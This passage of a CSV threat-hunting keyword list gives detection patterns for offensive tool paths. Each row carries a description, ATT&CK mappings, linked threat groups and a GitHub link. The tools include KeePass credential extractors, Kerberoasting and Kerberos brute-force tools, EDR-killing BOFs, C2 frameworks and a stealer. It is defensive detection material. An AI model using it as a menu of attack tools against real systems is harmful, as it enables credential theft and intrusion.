T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8294" "*/KDStab.*",".{0,1000}\/KDStab\..{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker 
- Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8295" "*/KDStab/*",".{0,1000}\/KDStab\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","8296" 
"*/KeeFarce.exe*",".{0,1000}\/KeeFarce\.exe.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8297" "*/KeeFarce.git*",".{0,1000}\/KeeFarce\.git.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8298" "*/KeeFarceDLL.dll*",".{0,1000}\/KeeFarceDLL\.dll.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","1","N/A","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","8299" "*/keepass_discover.py*",".{0,1000}\/keepass_discover\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8300" "*/keepass_discover_*.txt*",".{0,1000}\/keepass_discover_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black 
Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8301" "*/keepass_trigger.py*",".{0,1000}\/keepass_trigger\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8302" "*/keepwn.core.*",".{0,1000}\/keepwn\.core.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8303" "*/KeePwn.git*",".{0,1000}\/KeePwn\.git.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8304" "*/KeePwn.py*",".{0,1000}\/KeePwn\.py.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8305" "*/keepwn.utils.*",".{0,1000}\/keepwn\.utils.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential 
Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8306" "*/KeePwn/keepwn/*",".{0,1000}\/KeePwn\/keepwn\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8307" "*/KeePwn/tarball/*",".{0,1000}\/KeePwn\/tarball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8308" "*/KeePwn/zipball/*",".{0,1000}\/KeePwn\/zipball\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8309" "*/KeePwn-0.3/*",".{0,1000}\/KeePwn\-0\.3\/.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","8310" "*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","KeeTheft","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - 
T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8311" "*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8312" "*/KeeTheft.exe*",".{0,1000}\/KeeTheft\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","KeeTheft","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","8313" "*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8314" "*/KeeThief.git*",".{0,1000}\/KeeThief\.git.{0,1000}","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - 
TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","N/A","private github repo","10","","N/A","","","","8315" "*/KeeThief.ps1*",".{0,1000}\/KeeThief\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","8316" "*/kekeo.exe*",".{0,1000}\/kekeo\.exe.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","8317" "*/kematian.exe*",".{0,1000}\/kematian\.exe.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github.com/Pirate-Devs/Kematian","1","1","N/A","N/A","10","1","N/A","N/A","N/A","N/A","8318" "*/kerberoast.*",".{0,1000}\/kerberoast\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8319" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8320" "*/kerberoast.c*",".{0,1000}\/kerberoast\.c.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","8321" "*/kerberoast.h*",".{0,1000}\/kerberoast\.h.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","8322" "*/kerberoast.py*",".{0,1000}\/kerberoast\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8323" "*/kerberoast/*.*",".{0,1000}\/kerberoast\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","8324" "*/kerberoast_hashes_*.txt*",".{0,1000}\/kerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8325" "*/kerberoastables.txt*",".{0,1000}\/kerberoastables\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#linux","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8326" "*/KerberOPSEC.git*",".{0,1000}\/KerberOPSEC\.git.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","1","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","8327" "*/kerberos.py*",".{0,1000}\/kerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","8328" "*/kerberos-ldap-password-hunter*",".{0,1000}\/kerberos\-ldap\-password\-hunter.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8329" "*/kerberosticket.py*",".{0,1000}\/kerberosticket\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","8330" "*/Kerbeus-BOF.git*",".{0,1000}\/Kerbeus\-BOF\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","1","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","8331" "*/Kerbeus-BOF/*",".{0,1000}\/Kerbeus\-BOF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","#linux","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","8332" "*/kerbrute.git*",".{0,1000}\/kerbrute\.git.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8333" "*/kerbrute.go*",".{0,1000}\/kerbrute\.go.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8334" "*/kerbrute.py*",".{0,1000}\/kerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8335" "*/kerbrute/*",".{0,1000}\/kerbrute\/.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","1","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","8336" 
"*/KernelMii.c*",".{0,1000}\/KernelMii\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike (CS) Beacon Object File (BOF) foundation for kernel exploitation using CVE-2021-21551.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/tijme/kernel-mii","1","1","N/A","N/A","10","10","81","24","2023-05-07T18:38:29Z","2022-06-25T11:13:45Z","8337" "*/KExecDD.git*",".{0,1000}\/KExecDD\.git.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege 
